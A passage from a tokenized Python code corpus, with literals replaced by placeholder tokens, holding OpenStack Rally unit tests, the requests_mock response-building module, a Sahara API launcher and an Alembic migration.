<NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : [ ] } , <EOL> { "<STR_LIT>" : [ [ ] , [ ] , [ ] , [ ] ] , <EOL> "<STR_LIT>" : [ ] } <EOL> ) <EOL> @ ddt . unpack <EOL> def test_merge ( self , sources , expected_output ) : <EOL> in_iters = [ iter ( src ) for src in sources ] <EOL> out = list ( utils . merge ( <NUM_LIT:10> , * in_iters ) ) <EOL> self . assertEqual ( out , expected_output ) <EOL> class TimeoutThreadTestCase ( test . TestCase ) : <EOL> def test_timeout_thread ( self ) : <EOL> """<STR_LIT>""" <EOL> queue = Queue . Queue ( ) <EOL> killer_thread = threading . Thread ( <EOL> target = utils . timeout_thread , <EOL> args = ( queue , ) , <EOL> ) <EOL> test_thread = threading . Thread ( <EOL> target = utils . interruptable_sleep , <EOL> args = ( <NUM_LIT:30> , <NUM_LIT> ) , <EOL> ) <EOL> test_thread . start ( ) <EOL> start_time = time . time ( ) <EOL> queue . put ( ( test_thread . ident , start_time + <NUM_LIT:1> ) ) <EOL> killer_thread . start ( ) <EOL> test_thread . join ( ) <EOL> end_time = time . time ( ) <EOL> queue . put ( ( None , None ) ) <EOL> killer_thread . join ( ) <EOL> time_elapsed = end_time - start_time <EOL> self . assertTrue ( time_elapsed < <NUM_LIT:11> , <EOL> "<STR_LIT>" % time_elapsed ) </s>
<s> import mock <EOL> from rally import exceptions <EOL> from rally . plugins . common import types <EOL> from tests . unit import test <EOL> class PathOrUrlTestCase ( test . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_transform_file ( self , mock_requests_head , mock_isfile ) : <EOL> mock_isfile . return_value = True <EOL> path = types . PathOrUrl . transform ( None , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , path ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_transform_bogus ( self , mock_requests_head , mock_isfile ) : <EOL> mock_isfile . return_value = False <EOL> mock_requests_head . return_value = mock . Mock ( status_code = <NUM_LIT> ) <EOL> self . assertRaises ( exceptions . InvalidScenarioArgument , <EOL> types . PathOrUrl . transform , <EOL> None , "<STR_LIT>" ) <EOL> mock_requests_head . assert_called_once_with ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_transform_url ( self , mock_requests_head , mock_isfile ) : <EOL> mock_isfile . return_value = False <EOL> mock_requests_head . return_value = mock . Mock ( status_code = <NUM_LIT:200> ) <EOL> path = types . PathOrUrl . transform ( None , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , path ) <EOL> class FileTypeTestCase ( test . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" , <EOL> side_effect = mock . mock_open ( read_data = "<STR_LIT>" ) , <EOL> create = True ) <EOL> def test_transform_by_path ( self , mock_open ) : <EOL> resource_config = "<STR_LIT>" <EOL> file_context = types . FileType . transform ( <EOL> clients = None , resource_config = resource_config ) <EOL> self . assertEqual ( file_context , "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" , side_effect = IOError , create = True ) <EOL> def test_transform_by_path_no_match ( self , mock_open ) : <EOL> resource_config = "<STR_LIT>" <EOL> self . assertRaises ( IOError , <EOL> types . FileType . transform , <EOL> clients = None , <EOL> resource_config = resource_config ) <EOL> class FileTypeDictTestCase ( test . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" , <EOL> side_effect = mock . mock_open ( read_data = "<STR_LIT>" ) , <EOL> create = True ) <EOL> def test_transform_by_path ( self , mock_open ) : <EOL> resource_config = [ "<STR_LIT>" ] <EOL> file_context = types . FileTypeDict . transform ( <EOL> clients = None , <EOL> resource_config = resource_config ) <EOL> self . assertEqual ( file_context , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> @ mock . patch ( "<STR_LIT>" , side_effect = IOError , create = True ) <EOL> def test_transform_by_path_no_match ( self , mock_open ) : <EOL> resource_config = [ "<STR_LIT>" ] <EOL> self . assertRaises ( IOError , <EOL> types . FileTypeDict . transform , <EOL> clients = None , <EOL> resource_config = resource_config ) </s>
<s> import mock <EOL> from rally . plugins . openstack . context . quotas import manila_quotas <EOL> from tests . unit import test <EOL> CLIENTS_CLASS = ( <EOL> "<STR_LIT>" ) <EOL> class ManilaQuotasTestCase ( test . TestCase ) : <EOL> @ mock . patch ( CLIENTS_CLASS ) <EOL> def test_update ( self , mock_clients ) : <EOL> instance = manila_quotas . ManilaQuotas ( mock_clients ) <EOL> tenant_id = mock . MagicMock ( ) <EOL> quotas_values = { <EOL> "<STR_LIT>" : <NUM_LIT:10> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:7> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } <EOL> instance . update ( tenant_id , ** quotas_values ) <EOL> mock_clients . manila . return_value . quotas . update . assert_called_once_with ( <EOL> tenant_id , ** quotas_values ) <EOL> @ mock . patch ( CLIENTS_CLASS ) <EOL> def test_delete ( self , mock_clients ) : <EOL> instance = manila_quotas . ManilaQuotas ( mock_clients ) <EOL> tenant_id = mock . MagicMock ( ) <EOL> instance . delete ( tenant_id ) <EOL> mock_clients . manila . return_value . quotas . delete . assert_called_once_with ( <EOL> tenant_id ) </s>
<s> import ddt <EOL> import mock <EOL> from rally . plugins . openstack . scenarios . designate import utils <EOL> from tests . unit import test <EOL> DESIGNATE_UTILS = "<STR_LIT>" <EOL> @ ddt . ddt <EOL> class DesignateScenarioTestCase ( test . ScenarioTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( DesignateScenarioTestCase , self ) . setUp ( ) <EOL> self . domain = mock . Mock ( ) <EOL> self . zone = mock . Mock ( ) <EOL> self . server = mock . Mock ( ) <EOL> self . client = self . clients ( "<STR_LIT>" , version = "<STR_LIT:2>" ) <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT:email>" : "<STR_LIT>" } ) <EOL> def test_create_domain ( self , domain_data ) : <EOL> random_name = "<STR_LIT:foo>" <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> self . clients ( "<STR_LIT>" ) . domains . create . return_value = self . domain <EOL> expected = { "<STR_LIT:email>" : "<STR_LIT>" } <EOL> expected . update ( domain_data ) <EOL> expected [ "<STR_LIT:name>" ] = "<STR_LIT>" % random_name <EOL> domain = scenario . _create_domain ( domain_data ) <EOL> self . clients ( "<STR_LIT>" ) . domains . create . assert_called_once_with ( <EOL> expected ) <EOL> self . assertEqual ( self . domain , domain ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list_domains ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> return_domains_list = scenario . _list_domains ( ) <EOL> self . assertEqual ( self . clients ( "<STR_LIT>" ) . domains . list . return_value , <EOL> return_domains_list ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_delete_domain ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> domain = scenario . _create_domain ( ) <EOL> scenario . _delete_domain ( domain [ "<STR_LIT:id>" ] ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_update_domain ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> domain = scenario . _create_domain ( ) <EOL> self . clients ( "<STR_LIT>" ) . domains . update . return_value = self . domain <EOL> updated_domain = scenario . _update_domain ( domain ) <EOL> self . clients ( "<STR_LIT>" ) . domains . update . assert_called_once_with ( <EOL> domain ) <EOL> self . assertEqual ( self . domain , updated_domain ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT:data>" : "<STR_LIT:127.0.0.1>" } ) <EOL> def test_create_record ( self , record_data ) : <EOL> random_name = "<STR_LIT:foo>" <EOL> domain_name = "<STR_LIT>" <EOL> domain = { "<STR_LIT:name>" : domain_name , "<STR_LIT:id>" : "<STR_LIT>" } <EOL> record_name = "<STR_LIT>" % ( random_name , domain_name ) <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> expected = { "<STR_LIT:type>" : "<STR_LIT:A>" , "<STR_LIT:data>" : "<STR_LIT>" } <EOL> expected . update ( record_data ) <EOL> expected [ "<STR_LIT:name>" ] = record_name <EOL> scenario . _create_record ( domain , record = record_data ) <EOL> self . clients ( "<STR_LIT>" ) . records . create . assert_called_once_with ( <EOL> domain [ "<STR_LIT:id>" ] , expected ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list_records ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> return_records_list = scenario . _list_records ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . clients ( "<STR_LIT>" ) . records . list . return_value , <EOL> return_records_list ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_delete_record ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> domain_id = mock . Mock ( ) <EOL> record_id = mock . Mock ( ) <EOL> scenario . _delete_record ( domain_id , record_id ) <EOL> self . clients ( "<STR_LIT>" ) . records . delete . assert_called_once_with ( <EOL> domain_id , record_id ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> self . clients ( "<STR_LIT>" ) . records . delete . reset_mock ( ) <EOL> scenario . _delete_record ( domain_id , record_id , atomic_action = False ) <EOL> self . clients ( "<STR_LIT>" ) . records . delete . assert_called_once_with ( <EOL> domain_id , record_id ) <EOL> def test_create_server ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> random_name = "<STR_LIT:foo>" <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> explicit_name = "<STR_LIT>" <EOL> self . admin_clients ( <EOL> "<STR_LIT>" ) . servers . create . return_value = self . server <EOL> server = scenario . _create_server ( ) <EOL> self . admin_clients ( "<STR_LIT>" ) . servers . create . assert_called_once_with ( <EOL> { "<STR_LIT:name>" : "<STR_LIT>" % random_name } ) <EOL> self . assertEqual ( self . server , server ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> self . admin_clients ( "<STR_LIT>" ) . servers . create . reset_mock ( ) <EOL> data = { "<STR_LIT:name>" : explicit_name } <EOL> server = scenario . _create_server ( data ) <EOL> self . admin_clients ( <EOL> "<STR_LIT>" ) . servers . create . assert_called_once_with ( data ) <EOL> self . assertEqual ( self . server , server ) <EOL> def test_delete_server ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . _delete_server ( "<STR_LIT>" ) <EOL> self . admin_clients ( "<STR_LIT>" ) . servers . delete . assert_called_once_with ( <EOL> "<STR_LIT>" ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT:email>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> { <EOL> "<STR_LIT:email>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } ) <EOL> def test_create_zone ( self , zone_data ) : <EOL> scenario = utils . DesignateScenario ( ) <EOL> random_name = "<STR_LIT:foo>" <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> self . client . zones . create . return_value = self . zone <EOL> expected = { <EOL> "<STR_LIT:email>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT>" % random_name , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> expected . update ( zone_data ) <EOL> zone = scenario . _create_zone ( ** zone_data ) <EOL> self . client . zones . create . assert_called_once_with ( <EOL> description = None , <EOL> ttl = None , <EOL> ** expected ) <EOL> self . assertEqual ( self . zone , zone ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list_zones ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> return_zones_list = scenario . _list_zones ( ) <EOL> self . assertEqual ( self . client . zones . list . return_value , <EOL> return_zones_list ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_delete_zone ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> zone = scenario . _create_zone ( ) <EOL> scenario . _delete_zone ( zone [ "<STR_LIT:id>" ] ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list_recordsets ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> return_recordsets_list = scenario . _list_recordsets ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . client . recordsets . list . return_value , <EOL> return_recordsets_list ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT:data>" : "<STR_LIT:127.0.0.1>" } ) <EOL> def test_create_recordset ( self , recordset_data ) : <EOL> scenario = utils . DesignateScenario ( ) <EOL> random_name = "<STR_LIT:foo>" <EOL> zone_name = "<STR_LIT>" <EOL> random_recordset_name = "<STR_LIT>" % ( random_name , zone_name ) <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> zone = { "<STR_LIT:name>" : zone_name , "<STR_LIT:id>" : "<STR_LIT>" } <EOL> scenario . _create_recordset ( zone ) <EOL> self . client . recordsets . create . assert_called_once_with ( <EOL> zone [ "<STR_LIT:id>" ] , <EOL> name = random_recordset_name , <EOL> type_ = "<STR_LIT:A>" , <EOL> records = [ "<STR_LIT>" ] ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> self . client . recordsets . create . reset_mock ( ) <EOL> recordset = { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> scenario . _create_recordset ( zone , recordset ) <EOL> self . client . recordsets . create . assert_called_once_with ( <EOL> zone [ "<STR_LIT:id>" ] , <EOL> name = "<STR_LIT>" , <EOL> type_ = "<STR_LIT>" , <EOL> records = [ "<STR_LIT>" ] ) <EOL> self . client . recordsets . create . reset_mock ( ) <EOL> scenario . _create_recordset ( zone , { "<STR_LIT:type>" : "<STR_LIT:A>" } ) <EOL> self . client . recordsets . create . assert_called_once_with ( <EOL> zone [ "<STR_LIT:id>" ] , <EOL> name = "<STR_LIT>" , <EOL> type_ = "<STR_LIT:A>" , <EOL> records = [ "<STR_LIT>" ] ) <EOL> def test_delete_recordset ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> zone_id = mock . Mock ( ) <EOL> recordset_id = mock . Mock ( ) <EOL> scenario . _delete_recordset ( zone_id , recordset_id ) <EOL> self . client . recordsets . delete . assert_called_once_with ( <EOL> zone_id , recordset_id ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> self . client . recordsets . delete . reset_mock ( ) <EOL> scenario . _delete_recordset ( zone_id , recordset_id , atomic_action = False ) <EOL> self . client . recordsets . delete . assert_called_once_with ( <EOL> zone_id , recordset_id ) </s>
<s> import mock <EOL> from rally . plugins . openstack . scenarios . nova import flavors <EOL> from tests . unit import test <EOL> class NovaFlavorsTestCase ( test . TestCase ) : <EOL> def test_list_flavors ( self ) : <EOL> scenario = flavors . NovaFlavors ( ) <EOL> scenario . _list_flavors = mock . Mock ( ) <EOL> scenario . list_flavors ( detailed = True , fakearg = "<STR_LIT>" ) <EOL> scenario . _list_flavors . assert_called_once_with ( True , fakearg = "<STR_LIT>" ) </s>
<s> import ddt <EOL> import mock <EOL> from rally import exceptions <EOL> from rally . plugins . openstack . wrappers import cinder as cinder_wrapper <EOL> from tests . unit import test <EOL> @ ddt . ddt <EOL> class CinderWrapperTestCase ( test . ScenarioTestCase ) : <EOL> @ ddt . data ( <EOL> { "<STR_LIT:version>" : "<STR_LIT:1>" , "<STR_LIT>" : cinder_wrapper . CinderV1Wrapper } , <EOL> { "<STR_LIT:version>" : "<STR_LIT:2>" , "<STR_LIT>" : cinder_wrapper . CinderV2Wrapper } <EOL> ) <EOL> @ ddt . unpack <EOL> def test_wrap ( self , version , expected_class ) : <EOL> client = mock . MagicMock ( ) <EOL> client . choose_version . return_value = version <EOL> self . assertIsInstance ( cinder_wrapper . wrap ( client , mock . Mock ( ) ) , <EOL> expected_class ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_wrap_wrong_version ( self , mock_log ) : <EOL> client = mock . MagicMock ( ) <EOL> client . choose_version . return_value = "<STR_LIT>" <EOL> self . assertRaises ( exceptions . InvalidArgumentsException , <EOL> cinder_wrapper . wrap , client , mock . Mock ( ) ) <EOL> self . assertTrue ( mock_log . warning . mock_called ) <EOL> class CinderV1WrapperTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CinderV1WrapperTestCase , self ) . setUp ( ) <EOL> self . client = mock . MagicMock ( ) <EOL> self . client . choose_version . return_value = "<STR_LIT:1>" <EOL> self . owner = mock . Mock ( ) <EOL> self . wrapped_client = cinder_wrapper . wrap ( self . client , self . owner ) <EOL> def test_create_volume ( self ) : <EOL> self . wrapped_client . create_volume ( <NUM_LIT:1> , display_name = "<STR_LIT>" ) <EOL> self . client . return_value . volumes . create . assert_called_once_with ( <EOL> <NUM_LIT:1> , display_name = self . owner . generate_random_name . return_value ) <EOL> def test_update_volume ( self ) : <EOL> self . wrapped_client . update_volume ( "<STR_LIT>" , display_name = "<STR_LIT>" , <EOL> display_description = "<STR_LIT>" ) <EOL> self . client . return_value . volumes . update . assert_called_once_with ( <EOL> "<STR_LIT>" , <EOL> display_name = self . owner . generate_random_name . return_value , <EOL> display_description = "<STR_LIT>" ) <EOL> def test_create_snapshot ( self ) : <EOL> self . wrapped_client . create_snapshot ( "<STR_LIT>" , <EOL> display_name = "<STR_LIT>" ) <EOL> ( self . client . return_value . volume_snapshots . create . <EOL> assert_called_once_with ( <EOL> "<STR_LIT>" , <EOL> display_name = self . owner . generate_random_name . return_value ) ) <EOL> class CinderV2WrapperTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CinderV2WrapperTestCase , self ) . setUp ( ) <EOL> self . client = mock . MagicMock ( ) <EOL> self . client . choose_version . return_value = "<STR_LIT:2>" <EOL> self . owner = mock . Mock ( ) <EOL> self . wrapped_client = cinder_wrapper . wrap ( self . client , self . owner ) <EOL> def test_create_volume ( self ) : <EOL> self . wrapped_client . create_volume ( <NUM_LIT:1> , name = "<STR_LIT>" ) <EOL> self . client . return_value . volumes . create . assert_called_once_with ( <EOL> <NUM_LIT:1> , name = self . owner . generate_random_name . return_value ) <EOL> def test_create_snapshot ( self ) : <EOL> self . wrapped_client . create_snapshot ( "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> ( self . client . return_value . volume_snapshots . create . <EOL> assert_called_once_with ( <EOL> "<STR_LIT>" , <EOL> name = self . owner . generate_random_name . return_value ) ) <EOL> def test_update_volume ( self ) : <EOL> self . wrapped_client . update_volume ( "<STR_LIT>" , name = "<STR_LIT>" , <EOL> description = "<STR_LIT>" ) <EOL> self . client . return_value . volumes . update . assert_called_once_with ( <EOL> "<STR_LIT>" , name = self . owner . generate_random_name . return_value , <EOL> description = "<STR_LIT>" ) </s>
<s> import difflib <EOL> import os <EOL> from oslo_utils import encodeutils <EOL> import rally <EOL> from rally . cli import cliutils <EOL> from tests . unit import test <EOL> RES_PATH = os . path . join ( os . path . dirname ( rally . __file__ ) , os . pardir , "<STR_LIT>" ) <EOL> class BashCompletionTestCase ( test . TestCase ) : <EOL> def test_bash_completion ( self ) : <EOL> old = open ( os . path . join ( RES_PATH , <EOL> "<STR_LIT>" ) , "<STR_LIT:r>" ) . read ( ) . splitlines ( ) <EOL> new = cliutils . _generate_bash_completion_script ( ) . splitlines ( ) <EOL> if old != new : <EOL> for line in difflib . unified_diff ( old , new ) : <EOL> print ( line ) <EOL> new_filename = "<STR_LIT>" <EOL> with open ( new_filename , "<STR_LIT:wb>" ) as new_file : <EOL> new_file . write ( encodeutils . safe_encode ( "<STR_LIT:\n>" . join ( new ) ) ) <EOL> self . fail ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( new_filename , <EOL> new_filename ) ) </s>
<s> import json as jsonutils <EOL> from requests . adapters import HTTPAdapter <EOL> from requests . cookies import MockRequest , MockResponse <EOL> from requests . cookies import RequestsCookieJar <EOL> from requests . cookies import merge_cookies , cookiejar_from_dict <EOL> from requests . packages . urllib3 . response import HTTPResponse <EOL> import six <EOL> from requests_mock import compat <EOL> from requests_mock import exceptions <EOL> _BODY_ARGS = frozenset ( [ '<STR_LIT>' , '<STR_LIT:body>' , '<STR_LIT:content>' , '<STR_LIT:text>' , '<STR_LIT>' ] ) <EOL> _HTTP_ARGS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> _DEFAULT_STATUS = <NUM_LIT:200> <EOL> _http_adapter = HTTPAdapter ( ) <EOL> class CookieJar ( RequestsCookieJar ) : <EOL> def set ( self , name , value , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( CookieJar , self ) . set ( name , value , ** kwargs ) <EOL> def _check_body_arguments ( ** kwargs ) : <EOL> provided = [ x for x in _BODY_ARGS if kwargs . pop ( x , None ) is not None ] <EOL> if len ( provided ) > <NUM_LIT:1> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( provided ) ) <EOL> extra = [ x for x in kwargs if x not in _HTTP_ARGS ] <EOL> if extra : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( extra ) ) <EOL> class _FakeConnection ( object ) : <EOL> """<STR_LIT>""" <EOL> def send ( self , request , ** kwargs ) : <EOL> msg = '<STR_LIT>' '<STR_LIT>' <EOL> raise exceptions . InvalidRequest ( msg ) <EOL> def close ( self ) : <EOL> pass <EOL> def _extract_cookies ( request , response , cookies ) : <EOL> """<STR_LIT>""" <EOL> http_message = compat . _FakeHTTPMessage ( response . headers ) <EOL> response . cookies . extract_cookies ( MockResponse ( http_message ) , <EOL> MockRequest ( request ) ) <EOL> if cookies : <EOL> merge_cookies ( response . cookies , cookies ) <EOL> def create_response ( request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> connection = kwargs . pop ( '<STR_LIT>' , _FakeConnection ( ) ) <EOL> _check_body_arguments ( ** kwargs ) <EOL> raw = kwargs . pop ( '<STR_LIT>' , None ) <EOL> body = kwargs . pop ( '<STR_LIT:body>' , None ) <EOL> content = kwargs . pop ( '<STR_LIT:content>' , None ) <EOL> text = kwargs . pop ( '<STR_LIT:text>' , None ) <EOL> json = kwargs . pop ( '<STR_LIT>' , None ) <EOL> encoding = None <EOL> if content and not isinstance ( content , six . binary_type ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if text and not isinstance ( text , six . string_types ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if json is not None : <EOL> text = jsonutils . dumps ( json ) <EOL> if text is not None : <EOL> encoding = '<STR_LIT:utf-8>' <EOL> content = text . encode ( encoding ) <EOL> if content is not None : <EOL> body = six . BytesIO ( content ) <EOL> if not raw : <EOL> raw = HTTPResponse ( status = kwargs . get ( '<STR_LIT>' , _DEFAULT_STATUS ) , <EOL> headers = kwargs . get ( '<STR_LIT>' , { } ) , <EOL> reason = kwargs . get ( '<STR_LIT>' ) , <EOL> body = body or six . BytesIO ( six . b ( '<STR_LIT>' ) ) , <EOL> decode_content = False , <EOL> preload_content = False , <EOL> original_response = compat . _fake_http_response ) <EOL> response = _http_adapter . build_response ( request , raw ) <EOL> response . connection = connection <EOL> response . encoding = encoding <EOL> _extract_cookies ( request , response , kwargs . get ( '<STR_LIT>' ) ) <EOL> return response <EOL> class _Context ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , headers , status_code , reason , cookies ) : <EOL> self . headers = headers <EOL> self . status_code = status_code <EOL> self . reason = reason <EOL> self . cookies = cookies <EOL> class _MatcherResponse ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . _exc = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if self . _exc and kwargs : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> _check_body_arguments ( ** kwargs ) <EOL> self . _params = kwargs <EOL> content = self . _params . get ( '<STR_LIT:content>' ) <EOL> text = self . _params . get ( '<STR_LIT:text>' ) <EOL> if content and not ( callable ( content ) or <EOL> isinstance ( content , six . binary_type ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if text and not ( callable ( text ) or <EOL> isinstance ( text , six . string_types ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def get_response ( self , request ) : <EOL> if self . _exc : <EOL> raise self . _exc <EOL> cookies = self . _params . get ( '<STR_LIT>' , CookieJar ( ) ) <EOL> if isinstance ( cookies , dict ) : <EOL> cookies = cookiejar_from_dict ( cookies , CookieJar ( ) ) <EOL> context = _Context ( self . _params . get ( '<STR_LIT>' , { } ) . copy ( ) , <EOL> self . _params . get ( '<STR_LIT>' , _DEFAULT_STATUS ) , <EOL> self . _params . get ( '<STR_LIT>' ) , <EOL> cookies ) <EOL> def _call ( f , * args , ** kwargs ) : <EOL> return f ( request , context , * args , ** kwargs ) if callable ( f ) else f <EOL> return create_response ( request , <EOL> json = _call ( self . _params . get ( '<STR_LIT>' ) ) , <EOL> text = _call ( self . _params . get ( '<STR_LIT:text>' ) ) , <EOL> content = _call ( self . _params . get ( '<STR_LIT:content>' ) ) , <EOL> body = _call ( self . _params . get ( '<STR_LIT:body>' ) ) , <EOL> raw = self . _params . get ( '<STR_LIT>' ) , <EOL> status_code = context . status_code , <EOL> reason = context . reason , <EOL> headers = context . headers , <EOL> cookies = context . cookies ) </s>
<s> from sahara . utils import patches <EOL> patches . patch_minidom_writexml ( ) <EOL> import os <EOL> import sys <EOL> import oslo_i18n <EOL> from oslo_log import log as logging <EOL> possible_topdir = os . path . normpath ( os . path . join ( os . path . abspath ( sys . argv [ <NUM_LIT:0> ] ) , <EOL> os . pardir , <EOL> os . pardir ) ) <EOL> if os . path . exists ( os . path . join ( possible_topdir , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) : <EOL> sys . path . insert ( <NUM_LIT:0> , possible_topdir ) <EOL> oslo_i18n . enable_lazy ( ) <EOL> import sahara . main as server <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def setup_api ( ) : <EOL> server . setup_common ( possible_topdir , '<STR_LIT>' ) <EOL> app = server . make_app ( ) <EOL> server . setup_sahara_api ( '<STR_LIT>' ) <EOL> server . setup_auth_policy ( ) <EOL> return app <EOL> def main ( ) : <EOL> app = setup_api ( ) <EOL> launcher = server . get_process_launcher ( ) <EOL> api_service = server . SaharaWSGIService ( "<STR_LIT>" , app ) <EOL> server . launch_api_service ( launcher , api_service ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = True ) ) </s>
